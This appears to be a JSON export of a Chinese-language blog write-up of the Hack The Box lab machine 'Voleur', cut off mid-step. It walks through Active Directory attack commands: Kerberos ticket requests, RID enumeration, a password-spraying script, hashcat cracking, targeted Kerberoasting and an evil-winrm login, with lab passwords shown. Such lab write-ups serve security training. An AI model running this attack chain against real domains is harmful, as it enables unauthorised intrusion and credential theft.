{"id":313,"date":"2025-07-10T18:21:48","date_gmt":"2025-07-10T10:21:48","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=313"},"modified":"2026-01-29T16:18:33","modified_gmt":"2026-01-29T08:18:33","slug":"313","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/07\/10\/313\/","title":{"rendered":"HTB\u9776\u673a Voleur \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<code>10.129.20.186<\/code>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p>\n<p><strong>\u9898\u76ee\u51ed\u636e\uff1a<code>ryan.naylor \/ HollowOct31Nyt<\/code><\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.20.186 (10.129.20.186) 56(84) bytes of data.\n64 bytes from 10.129.20.186: icmp_seq=1 ttl=127 time=317 ms\n64 bytes from 10.129.20.186: icmp_seq=2 ttl=127 time=1567 ms\n64 bytes from 10.129.20.186: icmp_seq=3 ttl=127 time=538 ms\n64 bytes from 10.129.20.186: icmp_seq=4 ttl=127 time=358 ms\n\n--- 10.129.20.186 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3031ms\nrtt min\/avg\/max\/mdev = 316.726\/694.951\/1567.160\/510.389 ms, pipe 2<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul  6 06:27:58 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.20.186\nNmap scan report for 10.129.20.186\nHost is up (0.35s latency).\nAll 65535 scanned ports on 10.129.20.186 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Jul  6 06:28:45 2025 -- 1 IP address (1 host up) scanned in 47.03 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul  6 06:34:02 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.20.186\nNmap scan report for 10.129.20.186\nHost is up (0.37s latency).\nNot shown: 65515 filtered tcp ports (no-response)\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 06:35:31Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped\n2222\/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)\n|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)\n|_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)\n3269\/tcp  open  tcpwrapped\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n9389\/tcp  open  mc-nmf        .NET Message Framing\n49664\/tcp open  msrpc         Microsoft Windows RPC\n49667\/tcp open  msrpc         Microsoft Windows RPC\n49670\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n49671\/tcp open  msrpc         Microsoft Windows RPC\n60401\/tcp open  msrpc         Microsoft Windows RPC\n60409\/tcp open  msrpc         Microsoft Windows RPC\n60429\/tcp open  msrpc         Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)\nOS CPE: cpe:\/o:microsoft:windows_server_2022 cpe:\/o:microsoft:windows_server_2012:r2 cpe:\/o:microsoft:windows_server_2016\nAggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Host: DC; OSs: Windows, Linux; CPE: cpe:\/o:microsoft:windows, cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n|_clock-skew: 7h59m59s\n| smb2-time: \n|   date: 2025-07-06T06:36:35\n|_  start_date: N\/A\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   388.68 ms 10.10.14.1\n2   388.85 ms 10.129.20.186\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jul  6 06:37:19 2025 -- 1 IP address (1 host up) scanned in 197.54 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul  6 06:40:10 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.20.186\nNmap scan report for 10.129.20.186\nHost is up (0.33s latency).\nNot shown: 65531 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n389\/udp open  ldap\n\n# Nmap done at Sun Jul  6 06:41:19 2025 -- 1 IP address (1 host up) scanned in 68.88 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Windows Server<\/code>\uff0c\u4e3b\u57df\u540d\u4e3a<code>voleur.htb<\/code>\uff0c\u57df\u63a7\u4e3b\u673a\u540d\u4e3a<code>dc<\/code>\uff0c\u7981\u6b62\u4e86<code>NTLM<\/code>\u767b\u5f55\u3002\u9776\u673a\u8fd8\u8fd0\u884c\u4e00\u4e2a<code>Ubuntu Linux<\/code>\u5bb9\u5668\uff0c\u5e76\u5728<code>2222<\/code>\u7aef\u53e3\u5f00\u653e\u4e86<code>Linux SSH<\/code>\u670d\u52a1\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>Linux SSH\u670d\u52a1\uff082222\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>ssh<\/code>\u8fde\u63a5\u5bb9\u5668\u7684<code>root<\/code>\u7528\u6237\uff0c\u53d1\u73b0\u9700\u8981\u4f7f\u7528\u5bc6\u94a5\u767b\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751760800572-358318d1-a3e9-40df-b83d-b984842af8c0.png\" alt=\"\" \/><\/p>\n<h2>Kerberos\u670d\u52a1\uff0888\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>crackmapexec<\/code>\uff0c\u901a\u8fc7\u9898\u76ee\u7ed9\u51fa\u7684\u51ed\u636e\u767b\u5f55<code>SMB<\/code>\u670d\u52a1\uff0c\u4f46\u53d1\u73b0<code>NTLM<\/code>\u767b\u5f55\u88ab\u7981\u6b62\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751761006261-51e76abe-1615-4025-a03b-6a60b604a32d.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u4f7f\u7528<code>impacket-getTGT<\/code>\u5de5\u5177\u7533\u8bf7\u7968\u636e\uff0c\u968f\u540e\u4f7f\u7528<code>Kerberos<\/code>\u767b\u5f55<code>SMB<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">ntpdate -s dc.voleur.htb\nimpacket-getTGT voleur.htb\/ryan.naylor:\"HollowOct31Nyt\" -dc-ip 10.129.20.186\nexport KRB5CCNAME=\/home\/megumin\/Documents\/pentest_notes\/voleur\/ryan.naylor.ccache\ncrackmapexec smb dc.voleur.htb -d voleur.htb -u ryan.naylor -k --use-kcache<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751761256409-46044e40-a852-459b-b0dc-ec6e3fd7d622.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u4f7f\u7528<code>Kerberos<\/code>\u7968\u636e\u53ef\u6b63\u5e38\u767b\u5f55\u3002<\/p>\n<p>\u9996\u5148\u4f7f\u7528<code>impacket-lookupsid<\/code>\u5de5\u5177\u7206\u7834\u57df\u5185\u7528\u6237<code>RID<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-lookupsid -domain-sid -no-pass -k voleur.htb\/ryan.naylor@dc.voleur.htb 40000<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751761749007-1116c890-267e-4865-b1ee-9c89e2bb2c45.png\" alt=\"\" \/><\/p>\n<p>\u7ecf\u8fc7\u6574\u7406\uff0c\u5f97\u5230\u5982\u4e0b\u57df\u5185\u7528\u6237\u5217\u8868\uff1a<\/p>\n<pre><code class=\"language-plain\">Administrator\nGuest\nkrbtgt\nDC$\nryan.naylor\nmarie.bryant\nlacey.miller\nsvc_ldap\nsvc_backup\nsvc_iis\njeremy.combs\nsvc_winrm<\/code><\/pre>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\u3002<\/p>\n<h2>Windows SMB\u670d\u52a1<\/h2>\n<p>\u4f7f\u7528<code>impacket-smbclient<\/code>\u767b\u5f55\u9776\u673a<code>SMB<\/code>\u670d\u52a1\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-smbclient voleur.htb\/ryan.naylor@dc.voleur.htb -k -no-pass<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751770569218-1236db5e-9199-4465-ac18-41a308db20f5.png\" alt=\"\" \/><\/p>\n<p>\u767b\u5f55\u6210\u529f\uff01\u53d1\u73b0<code>SMB<\/code>\u670d\u52a1\u5185\u6709<code>3<\/code>\u4e2a\u7528\u6237\u5171\u4eab\uff1a<code>Finance<\/code>\u3001<code>HR<\/code>\u548c<code>IT<\/code>\u3002\u7ecf\u6d4b\u8bd5\uff0c\u53d1\u73b0\u53ea\u6709<code>IT<\/code>\u5171\u4eab\u53ef\u4ee5\u6b63\u5e38\u8bbf\u95ee\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751770718794-ca3acc34-2347-4484-8878-04896c290499.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u5171\u4eab\u5185\u6709\u76ee\u5f55<code>First Line Support<\/code>\uff0c\u76ee\u5f55\u5185\u6709<code>Excel<\/code>\u8868\u683c\u6587\u4ef6<code>Access_Review.xlsx<\/code>\uff0c\u4e0b\u8f7d\u540e\u6253\u5f00\uff0c\u53d1\u73b0\u4e3a\u52a0\u5bc6\u7535\u5b50\u8868\u683c\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751771164610-be917b5e-2451-4ab4-bbf6-93fefea1a7dc.png\" alt=\"\" \/><\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n<h2>\u57df\u5185\u5173\u7cfb\u6536\u96c6<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>bloodhound-python<\/code>\u5de5\u5177\u8fdb\u884c\u57df\u5185\u4fe1\u606f\u6536\u96c6\uff1a<\/p>\n<pre><code class=\"language-shell\">bloodhound-python -c All -d voleur.htb -u ryan.naylor -k -no-pass -ns 10.129.73.209 -dc dc.voleur.htb --zip<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751772005633-f6f3d195-3f57-4134-8c74-1ac476c54ccf.png\" alt=\"\" \/><\/p>\n<p>\u6536\u96c6\u5b8c\u6bd5\u540e\uff0c\u5c06\u6570\u636e\u96c6\u4e0a\u4f20\u81f3<code>BloodHound<\/code>\uff0c\u9996\u5148\u67e5\u770b\u6700\u77ed\u653b\u51fb\u8def\u5f84\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751772631026-a5754ebf-20f9-4f1d-9e57-351edf51fb73.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5982\u4e0b\u60c5\u51b5\uff1a<\/p>\n<ul>\n<li>\u5bb9\u5668<code>Third-Line Support Technicians<\/code>\u5185\u7684\u7528\u6237<code>jeremy.combs<\/code>\u53ef\u767b\u5f55<code>WinRM<\/code>\uff1b<\/li>\n<li><code>Service Accounts<\/code>\u5bb9\u5668\u5305\u542b<code>svc_winrm<\/code>\u7528\u6237\uff0c\u8be5\u7528\u6237\u53ef\u767b\u5f55<code>WinRM<\/code>\uff1b<\/li>\n<li><code>svc_ldap<\/code>\u7528\u6237\u5bf9<code>svc_winrm<\/code>\u7528\u6237\u5177\u6709<code>WriteSPN<\/code>\u6743\u9650\u3002<\/li>\n<\/ul>\n<p>\u4f46\u5f53\u524d\u7528\u6237<code>ryan.naylor<\/code>\u5e76\u4e0d\u5904\u4e8e\u653b\u51fb\u8def\u5f84\u4e0a\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>\u7834\u89e3\u52a0\u5bc6Excel\u7535\u5b50\u8868\u683c\u83b7\u5f97\u5bc6\u7801<\/h2>\n<p>\u5728<code>SMB<\/code>\u670d\u52a1\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u53d1\u73b0\u4e86\u4e00\u4efd\u52a0\u5bc6\u7684<code>Excel<\/code>\u8868\u683c\u6587\u4ef6\uff1a<code>Access_Review.xlsx<\/code>\uff0c\u73b0\u5728\u5c1d\u8bd5\u5bf9\u5176\u8fdb\u884c\u54c8\u5e0c\u63d0\u6743\u548c\u5bc6\u7801\u7834\u89e3\u3002<\/p>\n<p>\u9996\u5148\u4f7f\u7528<code>office2john<\/code>\u5de5\u5177\u63d0\u53d6\u54c8\u5e0c\u503c\uff0c\u53bb\u9664\u5b57\u7b26\u4e32\u5f00\u5934\u6587\u4ef6\u540d\u540e\uff0c\u4fdd\u5b58\u5230<code>Access_Review-xlsx-hash.txt<\/code>\u4e2d\uff1a<\/p>\n<pre><code class=\"language-shell\">office2john .\/Access_Review.xlsx | awk -F':' '{print $2}' &gt; Access_Review-xlsx-hash.txt<\/code><\/pre>\n<p>\u968f\u540e\u4f7f\u7528<code>hashcat<\/code>\u914d\u5408<code>rockyou.txt<\/code>\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-shell\">.\\hashcat.exe -m 9600 -a 0 Z:\\voleur\\Access_Review-xlsx-hash.txt .\\rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751773634770-ad57f816-b344-4f88-8383-ce51b6fb6d22.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u5f97\u6587\u4ef6\u8bbf\u95ee\u53e3\u4ee4\uff1a<\/p>\n<ul>\n<li>\u6587\u4ef6\u540d\uff1a<code>Access_Review.xlsx<\/code><\/li>\n<li>\u53e3\u4ee4\uff1a<code>football1<\/code><\/li>\n<\/ul>\n<p>\u6253\u5f00\u6587\u4ef6\u67e5\u770b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751775567105-f4227926-0327-404d-bb0f-0acae4d129a3.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u8868\u683c\u4e3a\u5458\u5de5\u4fe1\u606f\u8868\uff0c\u540c\u65f6\u5305\u542b\u4e09\u4e2a\u5bc6\u7801\uff1a<code>NightT1meP1dg3on14<\/code>\u3001<code>M1XyC9pW7qT5Vn<\/code>\u548c<code>N5pXyW1VqM7CZ8<\/code>\u3002<\/p>\n<p>\u76f4\u63a5\u5c06\u5bc6\u7801\u6dfb\u52a0\u81f3<code>pass.lst<\/code>\u4e2d\uff0c\u968f\u540e\u4f7f\u7528\u5982\u4e0b\u811a\u672c\u7a0b\u5e8f\u8fdb\u884c\u5bc6\u7801\u55b7\u6d12\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\nfor i in $(cat aduser.lst); do\n  for j in $(cat pass.lst)\n    do\n      cred_combo=\"Trying $i - $j ...... \"\n      cmd_output=$(impacket-getTGT voleur.htb\/$i:\"$j\" -dc-ip 10.129.73.209)\n      if [[ $cmd_output =~ \"Saving ticket\" ]]; then\n        echo -e \"\\e[1;32m [+] $cred_combo Success! \\e[0m\"\n      else\n        echo -e \"\\e[1;31m [-] \\e[0m $cred_combo Failed!\"\n      fi\n    done\ndone<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751778776680-38a0b526-94a6-4247-aad5-c60dbb701763.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u5982\u4e0b\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>voleur.htb<\/code>\uff0c\u7528\u6237\u540d\uff1a<code>ryan.naylor<\/code>\uff0c\u5bc6\u7801\uff1a<code>HollowOct31Nyt<\/code>;<\/li>\n<li>\u57df\uff1a<code>voleur.htb<\/code>\uff0c\u7528\u6237\u540d\uff1a<code>svc_ldap<\/code>\uff0c\u5bc6\u7801\uff1a<code>M1XyC9pW7qT5Vn<\/code>\uff1b<\/li>\n<li>\u57df\uff1a<code>voleur.htb<\/code>\uff0c\u7528\u6237\u540d\uff1a<code>svc_iis<\/code>\uff0c\u5bc6\u7801\uff1a<code>N5pXyW1VqM7CZ8<\/code>\u3002<\/li>\n<\/ul>\n<p>\u9605\u8bfb\u5458\u5de5\u4fe1\u606f\u5907\u6ce8\uff0c\u53d1\u73b0\u7528\u6237<code>svc_backup<\/code>\u7684\u51ed\u636e\u53ef\u80fd\u9700\u8981\u4ece<code>jeremy.combs<\/code>\u7528\u6237\u5904\u83b7\u5f97\uff0c\u800c<code>jeremy.combs<\/code>\u7528\u6237\u7591\u4f3c\u5bf9\u67d0\u4e2a\u540d\u4e3a<code>Software<\/code>\u7684\u76ee\u5f55\u5177\u6709\u8bbf\u95ee\u6743\u9650\u3002<\/p>\n<h2>\u57df\u5185\u5371\u9669\u5173\u7cfb\u5229\u7528<\/h2>\n<p>\u5728\u57df\u5185\u4fe1\u606f\u6536\u96c6\u9636\u6bb5\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0<code>svc_ldap<\/code>\u7528\u6237\u5bf9<code>svc_winrm<\/code>\u7528\u6237\u5177\u6709<code>WriteSPN<\/code>\u6743\u9650\uff0c\u800c<code>svc_winrm<\/code>\u7528\u6237\u521a\u597d\u53ef\u4ee5\u767b\u5f55<code>WinRM<\/code>\uff0c\u6240\u4ee5\u73b0\u5728\u76f4\u63a5\u4f7f\u7528<code>targetedKerberoast<\/code>\u5de5\u5177\u8fdb\u884c\u5229\u7528\uff1a<a href=\"https:\/\/github.com\/ShutdownRepo\/targetedKerberoast\" target=\"_blank\"  rel=\"nofollow\" >ShutdownRepo\/targetedKerberoast: Kerberoast with ACL abuse capabilities<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751779363192-1db67d74-dded-4620-b8c3-235dd838a41b.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-shell\">export KRB5CCNAME=\/home\/megumin\/Documents\/pentest_notes\/voleur\/svc_ldap.ccache\n\/home\/megumin\/Documents\/Programs\/targetedKerberoast\/targetedKerberoast.py -v -d voleur.htb -u svc_ldap -k --no-pass --dc-ip 10.129.73.209 --dc-host dc.voleur.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751779727169-ac55c71b-e357-4bea-a37f-c4602e9ed4c0.png\" alt=\"\" \/><\/p>\n<p>\u5c06<code>svc_winrm<\/code>\u7684\u54c8\u5e0c\u4fdd\u5b58\u5230\u6587\u672c\u6587\u4ef6\u5185\uff0c\u968f\u540e\u4f7f\u7528<code>hashcat<\/code>\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-powershell\">.\\hashcat.exe -m 13100 -a 0 Z:\\voleur\\userhash\\svc_winrm.txt .\\rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751780442579-c07795ce-684e-45cb-b599-3c11a0f12804.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u5f97\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>voleur.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>svc_winrm<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>AFireInsidedeOzarctica980219afi<\/code><\/li>\n<\/ul>\n<p>\u914d\u7f6e<code>\/etc\/krb5.conf<\/code>\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-plain\">[libdefaults]\n        default_realm = VOLEUR.HTB\n        dns_lookup_realm = false\n        dns_lookup_kdc = true\n        ticket_lifetime = 24h\n        forwardable = true\n\n[realms]\n        VOLEUR.HTB = {\n                kdc = DC.VOLEUR.HTB\n                admin_server = DC.VOLEUR.HTB\n                default_domain = DC.VOLEUR.HTB\n        }\n\n[domain_realm]\n        .voleur.htb = VOLEUR.HTB\n        voleur.htb = VOLEUR.HTB<\/code><\/pre>\n<p>\u968f\u540e\u4f7f\u7528<code>kinit<\/code>\u548c<code>impacket-getTGT<\/code>\u83b7\u53d6\u7968\u636e\uff0c\u76f4\u63a5\u767b\u5f55<code>WinRM<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">kinit svc_winrm@VOLEUR.HTB\nimpacket-getTGT voleur.htb\/svc_winrm:\"AFireInsidedeOzarctica980219afi\" -dc-ip 10.129.31.94\nexport KRB5CCNAME=\/home\/megumin\/Documents\/pentest_notes\/voleur\/svc_winrm.ccache\nevil-winrm -i dc.voleur.htb --realm VOLEUR.HTB<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751781278121-a39fdaaf-0d80-45fe-89df-fac86e91513a.png\" alt=\"\" \/><\/p>\n<p><strong>\u767b\u5f55\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u76ee\u5f55\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u767b\u5f55\u7cfb\u7edf\u540e\uff0c\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\uff0c\u5728<code>C<\/code>\u76d8\u6839\u76ee\u5f55\u4e0b\u627e\u5230\u4e86<code>SMB<\/code>\u670d\u52a1\u4e2d\u7684\u5171\u4eab\u76ee\u5f55\uff0c\u5176\u4e2d<code>Finance<\/code>\u548c<code>HR<\/code>\u76ee\u5f55\u4e3a\u7a7a\u76ee\u5f55\uff0c<code>C:\\IT<\/code>\u76ee\u5f55\u4e0b\u5b9e\u9645\u5b58\u5728<code>3<\/code>\u4e2a\u5b50\u76ee\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751787274958-2570d428-984a-4dec-8a97-8e74d186d51b.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u5217\u51fa<code>3<\/code>\u4e2a\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\uff0c\u4f46\u90fd\u63d0\u793a\u62d2\u7edd\u8bbf\u95ee\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751787450204-3fac723b-e2af-404b-95eb-a315c1e4be3e.png\" alt=\"\" \/><\/p>\n<p>\u7ed3\u5408\u57df\u4e2d\u5b58\u5728\u7684<code>3<\/code>\u4e2a\u5173\u4e8e<code>IT<\/code>\u7ba1\u7406\u5458\u7684\u7528\u6237\u7ec4\u540d\u79f0\uff0c\u63a8\u6d4b<code>SMB<\/code>\u670d\u52a1<code>IT<\/code>\u5171\u4eab\u5185\u7684\u4e09\u4e2a\u6587\u4ef6\u5939\u5b9e\u9645\u4e0a\u5bf9\u5e94\u4e0a\u8ff0<code>3<\/code>\u4e2a\u7528\u6237\u7ec4\uff0c\u53ea\u6709\u5904\u4e8e\u6b63\u786e\u7528\u6237\u7ec4\u4e2d\u7684\u7528\u6237\u624d\u80fd\u8bbf\u95ee\u5bf9\u5e94\u7684\u5171\u4eab\u3002\u4f8b\u5982\uff0c<code>ryan.naylor<\/code>\u7528\u6237\u5904\u4e8e<code>First-Line Technicians<\/code>\u7ec4\u4e2d\uff0c\u6240\u4ee5\u8be5\u7528\u6237\u624d\u80fd\u8bbf\u95ee<code>First-Line Support<\/code>\u6587\u4ef6\u5939\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1751787665638-9712d051-3918-4271-af85-7e8e3edb74d8.png\" alt=\"\" \/><\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u654f\u611f\u4fe1\u606f\u3002<\/p>\n<h2>\u6062\u590dtodd.wolfe\u7528\u6237<\/h2>\n<p>\u5728\u4e4b\u524d\u53d1\u73b0\u7684<code>Excel<\/code>\u7528\u6237\u8868\u683c\u4e2d\uff0c\u5b58\u5728\u7740\u4e00\u4e2a\u5df2\u7ecf\u88ab\u5220\u9664\u7684\u7528\u6237<code>todd.wolfe<\/code>\u7684\u8bb0\u5f55\u3002\u8be5\u7528\u6237\u5c5e\u4e8e<code>Second-Line Support Technician<\/code>\u7ec4\uff0c\u53ef\u80fd\u6709\u6743\u9650\u8bbf\u95ee<code>IT<\/code>\u5171\u4eab\u5185<code>Second Line Support<\/code>\u6587\u4ef6\u5939\u3002<\/p>\n<p>\u518d\u6b21\u67e5\u770b<code>BloodHound<\/code>\u6570\u636e\uff0c\u53d1\u73b0<code>svc_ldap<\/code>\u7528\u6237\u521a\u597d\u5c5e\u4e8e\u4e00\u4e2a\u540d\u4e3a<code>Restore_Users<\/code>\u7684\u7528\u6237\u7ec4\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752110338032-a7f8a412-0d9a-4c9c-b721-1e3b221d9911.png\" alt=\"\" \/><\/p>\n<p>\u6000\u7591<code>svc_ldap<\/code>\u7528\u6237\u6709\u6743\u9650\u64cd\u4f5c<code>Active Directory<\/code>\u56de\u6536\u7ad9\uff0c\u5e76\u5bf9\u5df2\u5220\u9664\u7684\u7528\u6237\u8fdb\u884c\u6062\u590d\u3002<\/p>\n<p>\u5c1d\u8bd5\u5b89\u88c5\u6700\u65b0\u7248\u672c\u7684<code>bloodyAD<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">pipx install bloodyAD<\/code><\/pre>\n<p>\u968f\u540e\u4f7f\u7528\u65b0\u7248<code>bloodyAD<\/code>\u7684\u6062\u590d\u7528\u6237\u529f\u80fd\uff0c\u901a\u8fc7<code>svc_ldap<\/code>\u7528\u6237\u8eab\u4efd\u5c06<code>todd.wolfe<\/code>\u7528\u6237\u4ece\u56de\u6536\u7ad9\u53d6\u56de\uff1a<\/p>\n<pre><code 